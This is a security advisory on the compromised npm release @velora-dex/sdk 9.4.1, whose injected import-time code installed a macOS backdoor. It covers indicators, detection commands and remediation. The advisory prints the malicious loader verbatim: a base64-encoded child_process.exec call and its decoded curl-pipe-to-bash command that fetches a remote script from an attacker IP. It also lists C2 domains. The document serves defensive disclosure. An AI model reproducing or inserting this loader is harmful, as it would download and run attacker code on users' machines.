Severity

critical

CVE

Not assigned

CWE

CWE-506, CWE-78

Affected Surface

@velora-dex/sdk 9.4.1, Velora DEX SDK consumers importing the npm package on macOS, DeFi and cryptocurrency applications using @velora-dex/sdk, Developer workstations and build runners with npm access to the compromised tarball

Wiz’s 27 May JINX-0164 report connects a broader cryptocurrency-developer intrusion campaign to an earlier npm supply-chain operation against @velora-dex/sdk, the official SDK for the Velora decentralized exchange ecosystem. The compromised release was @velora-dex/sdk@9.4.1, published on 7 April and later removed.

The package-level finding still matters for application security teams because the malicious code did not rely on a lifecycle script: it executed when application code imported the SDK. npm install --ignore-scripts therefore offered no protection; any test, local app, server-side render, build step, or REPL that later loaded the package would have run it.

Affected package

Affected:

  • @velora-dex/sdk 9.4.1

Clean or remediated:

  • @velora-dex/sdk 9.4.0 was the confirmed pre-compromise baseline in public diff reports.
  • @velora-dex/sdk 9.4.2 was published roughly three hours after the malicious release and reverted the injected code.
  • At the time of writing, npm metadata lists 9.5.3 as the latest release.

Observed npm publication timing:

9.4.0: 2026-03-23T13:16:02.405Z
9.4.1: 2026-04-07T19:03:33.087Z
9.4.2: 2026-04-07T22:25:50.515Z

The compromise lived only in the registry artifact. StepSecurity, SafeDep, and the upstream GitHub issue all report that the source repository never contained the malicious code; compared with 9.4.0, the published tarball changed only package.json and dist/index.js.

Import-time execution

The malicious release prepended three lines to dist/index.js, the package's main entry point. Wiz reports the decoded command as:

nohup bash -c "$(curl -fsSL http://89.36.224[.]5/troubleshoot/mac/install.sh)" > /dev/null 2>&1

The JavaScript wrapper used child_process.exec() to decode and run that command. The decode fallback, base64 --decode with base64 -D as the alternative, covers both GNU-style base64 and the -D decode flag of older macOS builds, consistent with the macOS-only payload:

'use strict'

const {exec} = require('child_process');
exec(`echo 'bm9odXAgYmFzaCAtYyAiJChjdXJsIC1mc1NMIGh0dHA6Ly84OS4zNi4yMjQuNS90cm91Ymxlc2hvb3QvbWFjL2luc3RhbGwuc2gpIiA+IC9kZXYvbnVsbCAyPiYx' | (base64 --decode 2>/dev/null || base64 -D) | bash`, function(error, stdout, stderr) {});

The data flow is direct:

application import
  -> dist/index.js main entry
  -> child_process.exec()
  -> base64 decode
  -> curl shell script from 89.36.224[.]5
  -> macOS architecture-specific payload
  -> launchctl persistence

Because the code sits in dist/index.js, any JavaScript runtime that imports the SDK triggers it, whether the import is CommonJS:

const { constructSimpleSDK } = require("@velora-dex/sdk");

or ESM:

import { constructSimpleSDK } from "@velora-dex/sdk";

No postinstall, preinstall, or prepare script needs to fire.

MINIRAT payload

Wiz names the second-stage malware MINIRAT, a lightweight Go backdoor compiled for macOS ARM64 and x86_64. It overlaps with JINX-0164’s social-engineering malware infrastructure but is smaller than the full AUDIOFIX stealer.

Reported MINIRAT behavior includes:

  • host fingerprinting, username collection, hostname collection, and public-IP lookup through api.ipify.org
  • check-in to C2 using the Mac hardware UUID as an identifier
  • file upload and download
  • compressed file upload
  • arbitrary shell-command execution
  • persistence through launchctl and a LaunchAgent

Public reporting gives these persistence indicators:

~/Library/Application Support/com.apple.Terminal/profiler
~/Library/LaunchAgents/com.apple.Terminal.profiler.plist
launchctl service: zsh.profiler

Wiz also reports shared C2 domains across MINIRAT and AUDIOFIX:

datahub.ink
cloud-sync.online
byte-io.us

Why this mattered to application teams

@velora-dex/sdk is a DeFi SDK, so its normal consumers include cryptocurrency applications, trading tools, wallet-adjacent services, and developer scripts that may have access to private infrastructure or signing workflows. That is an attractive environment for a macOS backdoor:

  • developer machines may hold wallet-extension state, SSH keys, cloud credentials, GitHub tokens, and package-manager credentials
  • build systems may hold deploy keys, npm tokens, and exchange or RPC credentials
  • application test suites may import the SDK as part of routine CI validation
  • incident responders may miss the execution point if they only look for install hooks

JINX-0164’s broader campaign shows the same preference for development infrastructure. Wiz and Infosecurity describe the actor using stolen GitHub tokens to exfiltrate CI/CD secrets and inject malware into internal repositories. The @velora-dex/sdk tarball compromise is the package-registry version of that playbook: compromise the artifact developers already import, then let normal build and runtime behavior execute the implant.

Detection and triage

Search dependency manifests, lockfiles, package caches, and SBOMs for the exact compromised version:

npm ls @velora-dex/sdk
pnpm why @velora-dex/sdk
yarn why @velora-dex/sdk

Then inspect lockfiles for:

@velora-dex/sdk@9.4.1

On macOS systems that may have imported the package, search for persistence and payload artifacts:

launchctl list | grep -E 'zsh\.profiler|com\.apple\.Terminal\.profiler'
test -f "$HOME/Library/LaunchAgents/com.apple.Terminal.profiler.plist" && echo "LaunchAgent plist present"
test -f "$HOME/Library/Application Support/com.apple.Terminal/profiler" && echo "profiler payload present"

Network logs should be reviewed for:

89.36.224.5
datahub.ink
cloud-sync.online
byte-io.us
api.ipify.org immediately before suspicious C2 check-in

Because the malicious code ran on import, correlate endpoint and CI logs with test execution, local development server startup, server-side rendering, and scripts that import @velora-dex/sdk, not just package installation timestamps.

Remediation

Move to a release other than 9.4.1 (9.4.2 reverted the injected code, and later releases are available), regenerate the lockfile, and reinstall after clearing the package cache so a cached 9.4.1 tarball cannot be reused. If a macOS host imported the compromised version, treat the host as compromised, remove the LaunchAgent persistence, and rotate secrets from a known-clean machine.

At minimum, rotate:

  • GitHub tokens, deploy keys, and SSH keys
  • npm tokens and package-publishing credentials
  • cloud provider keys and environment variables
  • cryptocurrency wallet or exchange credentials reachable from the host
  • CI/CD secrets exposed to jobs that imported the package

For future incidents, scan both source repositories and registry tarballs. The malicious @velora-dex/sdk code was absent from GitHub but present in the npm artifact that applications actually executed.

References